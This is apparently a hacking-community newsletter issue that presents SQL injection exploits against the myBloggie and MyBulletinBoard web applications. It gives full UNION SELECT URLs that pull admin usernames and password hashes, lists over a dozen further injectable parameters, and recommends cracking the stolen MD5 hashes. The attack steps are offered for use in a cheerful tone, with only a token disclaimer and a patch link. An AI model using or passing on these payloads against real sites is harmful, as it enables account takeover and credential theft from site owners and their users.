HBH Newsletter


Latest Exploits:

MyBloggie SQL exploit:

Vulnerable Systems:

* myBloggie version 2.1.1

* myBloggie version 2.1.2

myBloggie is a PHP-based weblog system, the new thing "you just gotta have".
A blog is where people put their - oh so interesting - lives, and when they can't code their own stuff they use CMSs like this one.
This particular piece of open source software has an SQL injection vulnerability, which can be used to get the admin hashes.
You can check whether a site is injectable by going to it, e.g.

www.example.com/mybloggie/index.php

and then inputting

mode=search&keyword=test'UNION SELECT * FROM test

If you get a nice SQL error saying that your syntax isn't what it is supposed to be, then you know it's exploitable.
To get the admin hashes use this link:

www.example.com/index.php?month_no=1&year=1&mode=viewdate&date_no=1%20UNION%20SELECT%20null,null,null,null,user,password,null,null,null,null%20FROM%20blog_user/*

This will print all the admin hashes together with the nicknames. Yippie!
Now that you have the hashes you can start cracking them; Cain & Abel is a good program for cracking MD5 hashes, and also the best known one for it.
It can be found at: http://www.oxid.it/cain.html

So how does it work?
Basically, when you request month_no=1&year=1&mode=viewdate&date_no=1, the script goes to the SQL database and fetches the entries matching the month_no and year variables.
This is done through SQL queries, and because the inputted text is badly checked you are able to slip in your own SQL and ask the database whatever you want. And hey, everyone knows that when you ask something nicely you always get what you want :p

/$\ source: security focus /$\

My BulletinBoard sql injection exploit:

Vulnerable Systems:

* MyBulletinBoard 1.00 Release Candidate 4

The second exploit works on the same principle as the one above: because of a lack of input checking on some variables, a user is able to ask the db nifty SQL questions :)
So, bringing it into real life, this would be it:

www.example.com/myBB/

{it could be named anything instead of the myBB folder, but that's the default from installation}
Then the first thing we can do is go to the calendar.php page and there's where we ask the db for the password hash by doing this:

www.example.com/myBB/calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users%20WHERE uid=(the id you want)/*

If the board is vulnerable we get a nice output with the password hash of the uid we entered. To find out which userid you want, check the member pages and click on a profile; the userid is in the URL.
If the exploit didn't work it could be because of the settings of the SQL database, but luckily for us there are still a lot of other exploitable variables :)

http://www.example.com/mybb/online.php?pidsql=)[sql_query]
http://www.example.com/mybb/memberlist.php?usersearch=%'[sql_query]
http://www.example.com/mybb/editpost.php?pid='[sql_query]
http://www.example.com/mybb/forumdisplay.php?fid='[sql_query]
http://www.example.com/mybb/newreply.php?tid='[sql_query]
http://www.example.com/mybb/search.php?action=results&sid='[sql_query]
http://www.example.com/mybb/showthread.php?tid='[sql_query]
http://www.example.com/mybb/showthread.php?pid='[sql_query]
http://www.example.com/mybb/usercp2.php?tid='[sql_query]
http://www.example.com/mybb/printthread.php?tid='[sql_query]
http://www.example.com/mybb/reputation.php?pid='[sql_query]
http://www.example.com/mybb/portal.php?action=do_login&username='[sql_query]
http://www.example.com/mybb/polls.php?action=newpoll&tid='[sql_query]
http://www.example.com/mybb/ratethread.php?tid='[sql_query]


/$\source: http://www.securityalertz.com/Article907.html /$\

How to solve this: http://www.mybboard.com/community/showthread.php?tid=2559 (security patch)

Disclaimer:
Make sure you only use this for educational purposes; anything illegal you do with it is your own business, and neither HBH nor I take responsibility for it.
Don't get all stupid with this, because 5 minutes of fame isn't really rewarding enough for the "shower fun hour" your future cell mates could play with you for the next 3 months. :)

Don't sit still, do the thing you love the most, but do it with style and honour :D

Any comments, fanmail, hatemail, suggestions, help, you know how to find me.

[$]Anarcho-Hippie[$]

Html Format by Anarcho-Hippie - HBHNewsletter 01